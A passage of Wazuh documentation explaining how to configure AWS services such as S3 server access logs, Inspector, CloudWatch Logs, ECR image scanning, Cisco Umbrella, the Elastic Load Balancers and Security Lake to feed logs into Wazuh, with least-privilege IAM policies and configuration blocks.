      <bucket type="server_access">
        <name><WAZUH_AWS_BUCKET></name>       <!-- PUT THE S3 BUCKET CHOSEN IN STEP 5 HERE -->
        <path>s3-server-logs</path>                   <!-- IF THE LOGS ARE NOT STORED IN THE BUCKET'S ROOT PATH, PUT  THE PATH TO THE LOGS CHOSEN IN STEP 5 HERE -->
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

Amazon S3 Server Access logs provide detailed records for the requests that were made to a bucket.

Below is a use case for Wazuh alerts built for Amazon S3 Server Access logs.

Monitoring server access logs

The following screenshots show some alerts with rule IDs 80364 and 80367 generated for requests made to a monitored S3 bucket.

Expand an alert to find more information about the monitored S3 bucket, the operation being performed, and the request URI.

Amazon Inspector

Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS. Two versions are available:

  • Amazon Inspector Classic: The original service, which assesses applications for exposure, vulnerabilities, and deviations from best practices.

  • Amazon Inspector (v2): The new version, offering consolidated scanning for EC2 instances, container images in Amazon ECR, and AWS Lambda functions.

Both versions produce detailed security findings prioritized by severity. Findings can be reviewed directly or included in assessment reports accessible via the Amazon Inspector console or API.

AWS configuration

Learn how to configure Amazon Inspector (Classic and v2) integration in Wazuh.

Amazon Inspector configuration

Amazon Inspector (v2) is available in your AWS account. To start using it:

  1. Open the Amazon Inspector page in the AWS Management Console.

  2. Click Get Started to access the dashboard.

  3. Configure your scanning preferences under General settings:

    • Enable EC2 scanning

    • Enable ECR scanning

    • Enable Lambda function scanning

Note

For detailed instructions on configuring scanning preferences, see the Amazon Inspector documentation.
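
Once scanning is enabled, you can optionally confirm that Amazon Inspector is producing findings from the AWS CLI. This is a minimal check and assumes the CLI is configured with permissions equivalent to the policy shown in the next section:

# List a few recent Amazon Inspector (v2) findings
aws inspector2 list-findings --max-results 5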

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "inspector:ListFindings",
                "inspector:DescribeFindings",
                "inspector2:ListFindings"
            ],
            "Resource": "*"
        }
    ]
}

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Inspector logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with both Inspector versions:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>no</run_on_start>
      <skip_on_error>no</skip_on_error>
      <service type="inspector">
        <aws_profile>default</aws_profile>
        <regions>us-east-1,us-east-2</regions>
      </service>
    </wodle>
    

    You must specify at least one region. You can add multiple comma-separated regions.

    Note

    The same configuration block processes findings from both Inspector Classic and Inspector (v2). Findings from v2 will have aws.source set to inspector2.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon CloudWatch Logs

AWS CloudWatch Logs is a service that allows users to centralize the logs from all their systems, applications, and AWS services in a single place. To understand how CloudWatch Logs works, it is important to learn about the following concepts:

  • Log events: CloudWatch saves the logs generated by the application or resource being monitored as log events. A log event is a record with two properties: the timestamp when the event occurred and the raw log message.

  • Log streams: Log events are stored in log streams. A log stream represents a sequence of events coming from the application instance or resource being monitored. All log events in a log stream share the same source.

  • Log groups: Log streams are grouped using log groups. A log group defines a group of log streams that share retention, monitoring, and access control settings.
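
The relationship between these concepts can be explored from the AWS CLI. The commands below are a minimal sketch that assumes a log group named example_log_group already exists in your account; <LOG_STREAM_NAME> is a placeholder for one of its streams:

# List log streams inside a log group, then fetch a few events from one stream
aws logs describe-log-streams --log-group-name example_log_group --max-items 5
aws logs get-log-events --log-group-name example_log_group --log-stream-name <LOG_STREAM_NAME> --limit 5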

AWS configuration

Learn how to configure the Amazon CloudWatch service to integrate with Wazuh.

Amazon CloudWatch configuration

AWS CloudWatch logs can be accessed by using the Wazuh CloudWatch Logs integration. The AWS API allows Wazuh to retrieve those logs, analyze them, and raise alerts if applicable.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "logs:DescribeLogStreams",
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "logs:GetLogEvents",
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:log-stream:<LOG_STREAM_NAME>"
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "logs:DescribeLogStreams",
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "logs:GetLogEvents",
                "logs:DeleteLogStream"
            ],
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:log-stream:<LOG_STREAM_NAME>"
        }
    ]
}

Note

<REGION>, <ACCOUNT_ID>, <LOG_GROUP_NAME>, and <LOG_STREAM_NAME> are placeholders. Replace them with the appropriate values.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon CloudWatch logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with CloudWatch Logs:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>5m</interval>
      <run_on_start>yes</run_on_start>
      <service type="cloudwatchlogs">
        <aws_profile>default</aws_profile>
        <aws_log_groups>example_log_group</aws_log_groups>
        <regions>us-east-1</regions>
      </service>
    </wodle>
    

    You must specify at least one AWS log group from which the logs will be extracted. You can add multiple regions by separating them with commas. If no region is specified, the Wazuh module for AWS will look for the log group in every available region.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
CloudWatch Logs use cases

Check the Amazon ECR Image scanning section to learn how to use the CloudWatch Logs integration to pull logs from Amazon ECR Image scans.

Amazon ECR Image scanning

Amazon ECR image scanning uses the Common Vulnerabilities and Exposures (CVEs) database from the open source Clair project to detect software vulnerabilities in container images and provide a list of scan findings, which can be easily integrated into Wazuh thanks to the Amazon CloudWatch Logs integration.

Amazon ECR sends an event to Amazon EventBridge when an image scan is completed. The event itself is only a summary and does not contain the details of the scan findings. However, it is possible to configure a Lambda function to request the scan findings details and store them in CloudWatch Logs. Here is a quick summary of what the workflow looks like:

  1. An image scan is triggered.

  2. Once the scan is completed, Amazon ECR sends an event to EventBridge.

  3. The "Scan completed" event triggers a Lambda function.

  4. The Lambda function takes the data from the "Scan completed" event and requests the scan details.

  5. The Lambda function creates a log group and a log stream in CloudWatch Logs to store the response received.

  6. Wazuh pulls the logs from the CloudWatch log groups using the CloudWatch Logs integration.

AWS configuration

The following sections cover how to configure AWS to store the scan findings in CloudWatch Logs and how to ingest them into Wazuh.

Amazon ECR Image scan configuration

AWS provides a template that logs the findings of Amazon ECR image scans to CloudWatch. The template uses an AWS Lambda function to accomplish this.

Uploading the template and creating a stack, uploading the images to Amazon ECR, scanning the images, and using the logger all require specific permissions. Because of this, you need to create a custom policy granting these permissions.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

You need the permissions listed below inside the sections for RoleCreator and PassRole to create and delete the stack based on the template.

Warning

Because these actions could otherwise be overly permissive, bind these permissions to the specific resources they apply to.

{
   "Sid": "RoleCreator",
   "Effect": "Allow",
   "Action": [
      "iam:CreateRole",
      "iam:PutRolePolicy",
      "iam:AttachRolePolicy",
      "iam:DeleteRolePolicy",
      "iam:DeleteRole",
      "iam:GetRole",
      "iam:GetRolePolicy",
      "iam:PassRole"
   ],
   "Resource": "arn:aws:iam::<ACCOUNT_ID>:role/*"
},
{
   "Sid": "PassRole",
   "Effect": "Allow",
   "Action": "iam:PassRole",
   "Resource": "arn:aws:iam::<ACCOUNT_ID>:role/*-LambdaExecutionRole*"
}
CloudFormation stack permissions

A CloudFormation stack is a collection of AWS resources that can be managed as a single unit, including creation, update, or deletion. You need the following permissions to create and delete any template-based CloudFormation stack.

{
   "Sid": "CloudFormationStackCreation",
   "Effect": "Allow",
   "Action": [
      "cloudformation:CreateStack",
      "cloudformation:ValidateTemplate",
      "cloudformation:CreateUploadBucket",
      "cloudformation:GetTemplateSummary",
      "cloudformation:DescribeStackEvents",
      "cloudformation:DescribeStackResources",
      "cloudformation:ListStacks",
      "cloudformation:DeleteStack",
      "s3:PutObject",
      "s3:ListBucket",
      "s3:GetObject",
      "s3:CreateBucket"
   ],
   "Resource": "*"
}
ECR registry and repository permissions

This Amazon ECR permission allows calls to the API through an IAM policy.

Note

Before authenticating to a registry and pushing or pulling any images from any Amazon ECR repository, you need ecr:GetAuthorizationToken.

{
   "Sid": "ECRUtilities",
   "Effect": "Allow",
   "Action": [
      "ecr:GetAuthorizationToken",
      "ecr:DescribeRepositories"
   ],
   "Resource": "*"
}
Image pushing and scanning permissions

You need the following Amazon ECR permissions to push images. They are scoped down to a specific repository. The steps to push Docker images are described in the Amazon ECR - pushing a docker image documentation.

{
   "Sid": "ScanPushImage",
   "Effect": "Allow",
   "Action": [
      "ecr:CompleteLayerUpload",
      "ecr:UploadLayerPart",
      "ecr:InitiateLayerUpload",
      "ecr:BatchCheckLayerAvailability",
      "ecr:PutImage",
      "ecr:ListImages",
      "ecr:DescribeImages",
      "ecr:DescribeImageScanFindings",
      "ecr:StartImageScan"
   ],
   "Resource": "arn:aws:ecr:<REGION>:<ACCOUNT_ID>:repository/<REPOSITORY_NAME>"
}
Amazon Lambda and Amazon EventBridge permissions

You need the following permissions to create and delete the resources handled by the Scan Findings Logger template.

{
   "Sid": "TemplateRequired0",
   "Effect": "Allow",
   "Action": [
      "lambda:RemovePermission",
      "lambda:DeleteFunction",
      "lambda:GetFunction",
      "lambda:CreateFunction",
      "lambda:AddPermission"
   ],
   "Resource": "arn:aws:lambda:<REGION>:<ACCOUNT_ID>:*"
},
{
   "Sid": "TemplateRequired1",
   "Effect": "Allow",
   "Action": [
      "events:RemoveTargets",
      "events:DeleteRule",
      "events:PutRule",
      "events:DescribeRule",
      "events:PutTargets"
   ],
   "Resource": "arn:aws:events:<REGION>:<ACCOUNT_ID>:*"
}
How to create the CloudFormation Stack
  1. Download the ECR Image Scan findings logger template from the official aws-samples GitHub repository.

  2. Access CloudFormation and click on Create stack.

  3. Create a new stack using the template from step 1.

  4. Choose a name for the stack and finish the creation process. No additional configuration is required.

  5. Wait until CREATE_COMPLETE status is reached. The stack containing the AWS Lambda is now ready to be used.

Once the stack configuration is completed, the Lambda can be tested by manually triggering an image scan of a container image in an Amazon ECR private registry. The scan results in the creation of a CloudWatch log group called /aws/ecr/image-scan-findings/<NAME_OF_ECR_REPOSITORY> containing the scan results. For every new scan, the corresponding log streams are created inside the log group.
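
A scan can also be triggered and its findings retrieved from the AWS CLI, which is a convenient way to test the Lambda end to end. The commands below are a sketch; the image tag is an example, and <NAME_OF_ECR_REPOSITORY> is the repository placeholder used elsewhere in this guide:

# Trigger a manual scan of an image in the repository (tag is an example)
aws ecr start-image-scan --repository-name <NAME_OF_ECR_REPOSITORY> --image-id imageTag=latest

# Retrieve the scan findings for the same image
aws ecr describe-image-scan-findings --repository-name <NAME_OF_ECR_REPOSITORY> --image-id imageTag=latest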

Configure Wazuh to process Amazon ECR image scanning logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with Amazon ECR Image scanning. Replace <NAME_OF_ECR_REPOSITORY> with the name of the Amazon ECR repository:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>5m</interval>
      <run_on_start>yes</run_on_start>
      <service type="cloudwatchlogs">
        <aws_profile>default</aws_profile>
        <aws_log_groups>/aws/ecr/<NAME_OF_ECR_REPOSITORY></aws_log_groups>
      </service>
    </wodle>
    

    Note

    Check the AWS CloudWatch Logs integration to learn more about how the CloudWatch Logs integration works.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

Amazon ECR provides an image scanning feature that uses the Common Vulnerabilities and Exposures (CVE) database from the open source Clair project to detect vulnerabilities in container images. Wazuh polls and detects these vulnerabilities from AWS CloudWatch.

Detecting vulnerabilities in container images

Check the Detecting vulnerabilities in container images using Amazon ECR blog to learn how to detect vulnerabilities in container images using Wazuh and Amazon ECR integration.

Cisco Umbrella

Cisco Umbrella is a cloud-based Secure Internet Gateway (SIG) platform that provides you with multiple levels of defense against internet-based threats.

Cisco Umbrella configuration

You can find how to configure this service in the official Cisco Umbrella documentation. Additionally, you must configure the service to export the logs it generates to an S3 bucket. You can find how to do that in the log management section of the official documentation.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Cisco Umbrella logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
    
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
    
      <bucket type="cisco_umbrella">
        <name><WAZUH_AWS_BUCKET></name>
        <path>dnslogs</path>
        <aws_profile>default</aws_profile>
      </bucket>
    
      <bucket type="cisco_umbrella">
        <name><WAZUH_AWS_BUCKET></name>
        <path>proxylogs</path>
        <aws_profile>default</aws_profile>
      </bucket>
    
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Elastic Load Balancers

AWS Elastic Load Balancers are services that distribute incoming traffic across multiple targets. The following sections explain the different types of load balancers available and how to configure and monitor them with Wazuh:

Amazon ALB

Elastic Load Balancing automatically distributes incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, in one or more Availability Zones. It monitors the health of its registered targets and routes traffic only to the healthy targets. Users can select the type of load balancer that best suits their needs. An Application Load Balancer (Amazon ALB) functions at the application layer, the seventh layer of the Open Systems Interconnection (OSI) model. After the load balancer receives a request, it evaluates the listener rules in priority order to determine which rule to apply, then selects a target from the target group for the rule action.

AWS configuration

The following sections cover how to configure the Amazon ALB service to integrate with Wazuh.

Amazon ALB configuration
  1. Go to S3 buckets and copy the name of an existing S3 bucket, or create a new one.

  2. On your AWS console, search for "EC2" or go to Services > Compute > EC2.

  3. Go to Load Balancing > Load Balancers on the left menu. Create a new load balancer or select one or more load balancers and select Edit load balancer attributes on the Actions menu.

  4. In the Monitoring tab, enable Access logs and define the S3 bucket and the path where the logs will be stored.

    Note

    To enable access logs for Application Load Balancers (ALB), check the AWS documentation on enabling access logs for your Application Load Balancer. An equivalent AWS CLI command is shown below.
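
    The following sketch applies the same configuration from the AWS CLI. The load balancer ARN is a placeholder, and the prefix is kept consistent with the <path> value used in the Wazuh configuration later in this section:

      # Enable ALB access logs and deliver them to the bucket under the ALB/ prefix
      aws elbv2 modify-load-balancer-attributes \
        --load-balancer-arn <LOAD_BALANCER_ARN> \
        --attributes Key=access_logs.s3.enabled,Value=true \
                     Key=access_logs.s3.bucket,Value=<WAZUH_AWS_BUCKET> \
                     Key=access_logs.s3.prefix,Value=ALB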

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon ALB logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="alb">
        <name><WAZUH_AWS_BUCKET></name>
        <path>ALB</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon CLB

Elastic Load Balancing automatically distributes incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, in one or more Availability Zones. It monitors the health of its registered targets and routes traffic only to the healthy targets. Users can select the type of load balancer that best suits their needs. A Classic Load Balancer (Amazon CLB) makes routing decisions at either the transport layer (TCP/SSL) or the application layer (HTTP/HTTPS). Classic Load Balancers currently require a fixed relationship between the load balancer port and the container instance port.

AWS configuration

The following sections cover how to configure the Amazon CLB service to integrate with Wazuh.

Amazon CLB configuration
  1. Go to S3 buckets and copy the name of an existing S3 bucket, or create a new one.

  2. On your AWS console, search for "EC2" or go to Services > Compute > EC2.

  3. Go to Load Balancing > Load Balancers on the left menu. Create a new load balancer or select one or more load balancers and select Edit load balancer attributes on the Actions menu.

  4. In the Monitoring tab define the S3 bucket and the path where the logs will be stored.

    Note

    To enable access logs for Classic Load Balancers (CLB), check the AWS documentation on enabling access logs for your Classic Load Balancer.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon CLB logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="clb">
        <name><WAZUH_AWS_BUCKET></name>
        <path>CLB</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon NLB

Elastic Load Balancing automatically distributes incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, in one or more Availability Zones. It monitors the health of its registered targets and routes traffic only to the healthy targets. Users can select the type of load balancer that best suits their needs. A Network Load Balancer (Amazon NLB) functions at the fourth layer of the Open Systems Interconnection (OSI) model and can handle millions of requests per second. After the load balancer receives a connection request, it selects a target from the target group for the default rule and attempts to open a TCP connection to the selected target on the port specified in the listener configuration.

AWS configuration

The following sections cover how to configure the Amazon NLB service to integrate with Wazuh.

Amazon NLB configuration
  1. Go to S3 buckets and copy the name of an existing S3 bucket, or create a new one.

  2. On your AWS console, search for "EC2" or go to Services > Compute > EC2.

  3. Go to Load Balancing > Load Balancers on the left menu. Create a new load balancer or select one or more load balancers and select Edit load balancer attributes on the Actions menu.

  4. In the Monitoring tab define the S3 bucket and the path where the logs will be stored.

    Note

    To enable access logs for Network Load Balancers (NLB), check the AWS documentation on enabling access logs for your Network Load Balancer.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. The attaching a policy to an IAM user group guide shows how to attach a policy to a group. More information on other methods is available in the AWS documentation.

Configure Wazuh to process Amazon NLB logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="nlb">
        <name><WAZUH_AWS_BUCKET></name>
        <path>NLB</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon Security Lake

Note

This document guides you through setting up Wazuh as a subscriber to AWS Security Lake data. To configure Wazuh as a source for Amazon Security Lake, refer to the Amazon Security Lake integration documentation.

Amazon Security Lake is a fully-managed security data lake service that consolidates data from multiple AWS and other services, optimizing storage costs and performance at scale.

All logs in Amazon Security Lake use the Open Cybersecurity Schema Framework (OCSF) standard for formatting. You can use the Wazuh integration for Amazon Security Lake to ingest security events from AWS services.

These events are available as multi-event Apache Parquet objects in an S3 bucket. Each object has a corresponding SQS message that is sent once it is ready for download.

Wazuh periodically checks for new SQS messages, downloads new objects, converts the files from Parquet to JSON, and indexes each event into the Wazuh indexer. To set up the Wazuh integration for Amazon Security Lake as a subscriber, you need to do the following:

  1. Create a subscriber in Amazon Security Lake.

  2. Set up the Wazuh integration for Amazon Security Lake.

AWS configuration

The following sections cover how to configure the Amazon Security Lake service to integrate with Wazuh.

Enabling Amazon Security Lake

If you haven't already, ensure that you have enabled Amazon Security Lake by following the instructions at Getting started - Amazon Security Lake.

For multiple AWS accounts, we strongly encourage you to use AWS Organizations and set up Amazon Security Lake at the Organization level.

Creating a Subscriber in Amazon Security Lake

After completing all required AWS prerequisites, configure a subscriber for Amazon Security Lake via the AWS console. This creates the resources you need to make the Amazon Security Lake events available for consumption in your Wazuh platform deployment.

Setting up a subscriber in the AWS Console
Logging in and navigating
  1. Log into your AWS console and navigate to Security Lake.

  2. Navigate to Subscribers, and click Create subscriber.

Creating a subscriber
  1. Enter a descriptive name for your subscriber. For example, Wazuh.

  2. Enter the AWS account ID for the account you are currently logged into.

  3. Enter a unique value in External ID. For example, WAZUH-EXTERNAL-ID-VALUE.

  4. Choose to either collect all log and event sources, or only specific log and event sources.

  5. Select S3 as your data access method.

  6. Under S3 notification type select SQS queue.

  7. Click the Create button to return to the Subscribers page.

Reviewing the subscriber
  1. Navigate to My subscribers section, and click on your newly created subscriber to get to the Subscriber details page.

  2. Check that AWS created the subscriber with the correct parameters.

  3. Save the SQS queue name. You need the name of the Subscription endpoint later, when verifying the information in the SQS queue.

Verifying information in SQS Queue

Follow these steps in your Amazon deployment to verify the information for the SQS Queue that Security Lake creates.

  1. In your AWS console, navigate to the Amazon Simple Queue Service.

  2. In the Queues section, navigate to the queue that Security Lake created. Click on its name.

  3. In the information page for the queue, click on the Monitoring tab. Verify that events are flowing in by looking at the Approximate Number Of Messages Visible graph and confirming the number is increasing.
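
The same check can be performed from the AWS CLI. This is a minimal sketch; replace the queue URL with the one shown on the queue's details page:

# Check how many Security Lake notifications are currently waiting in the queue
aws sqs get-queue-attributes \
  --queue-url <SQS_QUEUE_URL> \
  --attribute-names ApproximateNumberOfMessages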

Verifying events are flowing into S3 bucket

Follow these steps in your Amazon deployment to verify that parquet files are flowing into your configured S3 buckets.

  1. In your AWS console, navigate to the Amazon S3 service.

  2. Navigate to the Buckets section, and click on the S3 bucket name that Security Lake created for each applicable region. These bucket names start with the prefix aws-security-data-lake.

  3. In each applicable bucket, navigate to the Objects tab. Click through the directories to verify that Security Lake has available events flowing into the S3 bucket. Check that new files with the .gz.parquet extension appear.

